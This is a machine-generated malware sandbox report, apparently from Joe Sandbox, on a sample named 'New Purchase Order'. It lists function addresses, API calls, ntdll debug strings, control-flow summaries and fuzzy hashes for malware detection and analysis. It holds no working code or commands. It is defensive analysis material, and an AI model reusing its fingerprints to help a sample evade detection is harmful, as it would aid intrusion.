                                                          Function 00413F93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                          APIs
                                                          • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: l420377x$l420377x
                                                          • API String ID: 1836367815-444879537
                                                          • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                          • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                          • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                          • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5
                                                          Function 00413F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                          APIs
                                                          • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: l420377x$l420377x
                                                          • API String ID: 1836367815-444879537
                                                          • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                          • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                          • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                          • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5
                                                          Function 0042C9E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: wdA
                                                          • API String ID: 3298025750-2931128418
                                                          • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                          • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                          • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                          • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8
                                                          Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                          • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                          • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                          • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9
                                                          Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                          • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                          • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                          • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4
                                                          Function 01732C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 386 1732c0a-1732c0f 387 1732c11-1732c18 386->387 388 1732c1f-1732c26 LdrInitializeThunk 386->388
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1fe22749b42541f7743aea3686f67b2e27142dd1848421957dec3d080b1e2719
                                                          • Instruction ID: 198a11d1ac590dde7fbd34f8dd3b371528311f32af989f5da8fdefbc5d9500a5
                                                          • Opcode Fuzzy Hash: 1fe22749b42541f7743aea3686f67b2e27142dd1848421957dec3d080b1e2719
                                                          • Instruction Fuzzy Hash: 1EB09B71A055C5C6DB11F7A44608717B90077D0701F15C071D2030651F4778D1D1E276

                                                          Non-executed Functions

                                                          Function 01772349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: 36f08d76a292c47ae36fd4011f5aac7c76fa80348381e7e9aab3599b0bb3ec64
                                                          • Instruction ID: d280fa8421f02fc59fc0aa51332ffbca49cd5c0c418a85c754f3e67307cfec84
                                                          • Opcode Fuzzy Hash: 36f08d76a292c47ae36fd4011f5aac7c76fa80348381e7e9aab3599b0bb3ec64
                                                          • Instruction Fuzzy Hash: FF92A071604342AFEB21DF28C844B6BF7E9BB88754F04492DFAA5D7252D770E844CB92
                                                          Function 01728620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Thread identifier, xrefs: 0176553A
                                                          • Address of the debug info found in the active list., xrefs: 017654AE, 017654FA
                                                          • Critical section debug info address, xrefs: 0176541F, 0176552E
                                                          • double initialized or corrupted critical section, xrefs: 01765508
                                                          • Invalid debug info address of this critical section, xrefs: 017654B6
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0176540A, 01765496, 01765519
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01765543
                                                          • Critical section address., xrefs: 01765502
                                                          • 8, xrefs: 017652E3
                                                          • Critical section address, xrefs: 01765425, 017654BC, 01765534
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017654CE
                                                          • undeleted critical section in freed memory, xrefs: 0176542B
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017654E2
                                                          • corrupted critical section, xrefs: 017654C2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 5be892da9b38f2e032162fc6ebbeb60f9247521d19a1db6a79892ad7db2039fd
                                                          • Instruction ID: 1b2222afa5a66da22aa559bb3a4ea6f19383d8581dea3cf6c05f86ec797a1f09
                                                          • Opcode Fuzzy Hash: 5be892da9b38f2e032162fc6ebbeb60f9247521d19a1db6a79892ad7db2039fd
                                                          • Instruction Fuzzy Hash: CB819AB1A01358EFDB20CF9ACC49BAEFBF9AB48B14F204159F909B7241C775A945CB50
                                                          Function 017229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017622E4
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01762412
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017624C0
                                                          • @, xrefs: 0176259B
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017625EB
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01762506
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01762498
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01762409
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01762602
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01762624
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0176261F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: 5f424d379682393a24051b90ca26c7cabc17935e61bff5af778b5e591c683701
                                                          • Instruction ID: e037b5da300b719a657b4286c7c63dd5f24a6500957c0c6c94be67613aa33f9e
                                                          • Opcode Fuzzy Hash: 5f424d379682393a24051b90ca26c7cabc17935e61bff5af778b5e591c683701
                                                          • Instruction Fuzzy Hash: 7D0260B1D042299BDB71DB54CD84BEAF7B8AB54304F4041DAEA09A7242EB309FC5CF59
                                                          Function 01798B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 30b35645e67da624c17e4fb9170bcc9a7e322ae8f77ad67b0ca104ee6114b6ac
                                                          • Instruction ID: 774dc64b8b61ca341ac8083e64b809717a2d277a271bdce9ff3da0032dc1d4f1
                                                          • Opcode Fuzzy Hash: 30b35645e67da624c17e4fb9170bcc9a7e322ae8f77ad67b0ca104ee6114b6ac
                                                          • Instruction Fuzzy Hash: 7C5101711053499BCB29CF289844BABFBE8EF9A600F14492DEA59C3241E770D548CB93
                                                          Function 017A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: f7ecd30b3a12efb7e29923437c0c6c7b232cadd5d53d0532fae43f1cc8dcd20c
                                                          • Instruction ID: 0c93fb793054538b30495c38c1caa5f2462ca95fa1b0b57f00f8f4d551f37cc9
                                                          • Opcode Fuzzy Hash: f7ecd30b3a12efb7e29923437c0c6c7b232cadd5d53d0532fae43f1cc8dcd20c
                                                          • Instruction Fuzzy Hash: 20D1EF31600286DFDB22DF68C844AA9FBF2FF8A714F588A4DF4469B252C734E940CB54
                                                          Function 017789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • VerifierFlags, xrefs: 01778C50
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01778A3D
                                                          • VerifierDlls, xrefs: 01778CBD
                                                          • HandleTraces, xrefs: 01778C8F
                                                          • AVRF: -*- final list of providers -*- , xrefs: 01778B8F
                                                          • VerifierDebug, xrefs: 01778CA5
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01778A67
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: 6ade8bdeb9f185c8fe319018629949f092492bb2079b0d569813740bed1ad908
                                                          • Instruction ID: 589fd3e2d05dcf51d5e5a424920c05699137ef884f91392684d9b8a9d3514aa4
                                                          • Opcode Fuzzy Hash: 6ade8bdeb9f185c8fe319018629949f092492bb2079b0d569813740bed1ad908
                                                          • Instruction Fuzzy Hash: 7A9116B2A453169FDB21EF28CC88B2AFBE8AB58728F45455CFA416F254C7709D00C796
                                                          Function 017263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: dbee8f080aadc2274fc321f1a22abcaaa60ec9c33d7563130261529e827221d6
                                                          • Instruction ID: f7c9e46c4e23a0a5c6fdd9250fcf7cc441f544418df60ac522ba9fa54a95a033
                                                          • Opcode Fuzzy Hash: dbee8f080aadc2274fc321f1a22abcaaa60ec9c33d7563130261529e827221d6
                                                          • Instruction Fuzzy Hash: AB913970B00325DBDB35DF58D888BAAFBE5BB58B24F24406DFD026B285D7709942C790
                                                          Function 016E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01749A2A
                                                          • apphelp.dll, xrefs: 016E6496
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017499ED
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01749A01
                                                          • LdrpInitShimEngine, xrefs: 017499F4, 01749A07, 01749A30
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01749A11, 01749A3A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: a85dbaca693cee3a38de59c70c3cb60561b2b7648dad29611728e308e61879b3
                                                          • Instruction ID: 33f741123175c6500443ebb32c167582ed183e96156010bca0992e4c5c205ca7
                                                          • Opcode Fuzzy Hash: a85dbaca693cee3a38de59c70c3cb60561b2b7648dad29611728e308e61879b3
                                                          • Instruction Fuzzy Hash: 8F51E3713483059FD721DF24CC95BABB7E8FB98658F00491DFA869B154D730EA04CB92
                                                          Function 01722674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01762180
                                                          • SXS: %s() passed the empty activation context, xrefs: 01762165
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017621BF
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0176219F
                                                          • RtlGetAssemblyStorageRoot, xrefs: 01762160, 0176219A, 017621BA
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01762178
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: 707ddd23b5cc6c6a1a4d2c8642b35878906563f75b23a7f634a4dad76639aafe
                                                          • Instruction ID: 5f5f8807aae7d976e3195f489124168f72f18f69f730e9851432bf808a15e875
                                                          • Opcode Fuzzy Hash: 707ddd23b5cc6c6a1a4d2c8642b35878906563f75b23a7f634a4dad76639aafe
                                                          • Instruction Fuzzy Hash: 63310536F44235BBEB219A998C45F6BFA68DB64A54F050069FF05BB242D270DE01C6A2
                                                          Function 0172C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01768181, 017681F5
                                                          • LdrpInitializeProcess, xrefs: 0172C6C4
                                                          • Loading import redirection DLL: '%wZ', xrefs: 01768170
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 017681E5
                                                          • LdrpInitializeImportRedirection, xrefs: 01768177, 017681EB
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0172C6C3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 2d77102b45d14a7b22713a9dfe4b7822845dc755e93244c782c496020d2acb12
                                                          • Instruction ID: 137aa08ca66ab467dad279ae29d16fed6718b9f1a7af1a927b5e96813f64eae8
                                                          • Opcode Fuzzy Hash: 2d77102b45d14a7b22713a9dfe4b7822845dc755e93244c782c496020d2acb12
                                                          • Instruction Fuzzy Hash: 1431E4B16443169BC324EF28DD4AE2AF7D4EF95B20F00055CF9856B299D620ED05C7A3
                                                          Function 0173096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 01732DF0: LdrInitializeThunk.NTDLL ref: 01732DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730D74
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: 9d1438a662f2dfa42904f7b863a7ad97c7aa641e77df6589a4473aaa8781ae0b
                                                          • Instruction ID: cbbcab4355fd8f15076df7dfec9d3c31e7068aaf8833c5f43f41232a397c123e
                                                          • Opcode Fuzzy Hash: 9d1438a662f2dfa42904f7b863a7ad97c7aa641e77df6589a4473aaa8781ae0b
                                                          • Instruction Fuzzy Hash: 67426D71900715DFDB21CF28C884BAAB7F5FF48314F1445A9E989EB246E770AA85CF60
                                                          Function 016FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: 6d5df1832bdd4ef25c03ea500fd9aaa63ba485d555b739de774906b7285845ec
                                                          • Instruction ID: 6e13bf4f3608a1fac8454023d0574533662305fed955e8b0e97d5b59c71d1649
                                                          • Opcode Fuzzy Hash: 6d5df1832bdd4ef25c03ea500fd9aaa63ba485d555b739de774906b7285845ec
                                                          • Instruction Fuzzy Hash: 33C18C74108386CFD711CF98C844B6AB7E4BF84704F04896EFA998B352E774D94ACB56
                                                          Function 01728402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0172855E
                                                          • LdrpInitializeProcess, xrefs: 01728422
                                                          • @, xrefs: 01728591
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01728421
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 481ec0e514ef1248359b621a4703795b2b7c5609b847846d94ff80f71cee4133
                                                          • Instruction ID: 9b1e4600e3fda18927e051f74b56fe761c67386e891cd0cacafcd5d3a3c9af8b
                                                          • Opcode Fuzzy Hash: 481ec0e514ef1248359b621a4703795b2b7c5609b847846d94ff80f71cee4133
                                                          • Instruction Fuzzy Hash: 8B91A971508355AFD722DF66CC44FABFAECFB88684F40092EFA8496146E331D9059B63
                                                          Function 0172273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() passed the empty activation context, xrefs: 017621DE
                                                          • .Local, xrefs: 017228D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017621D9, 017622B1
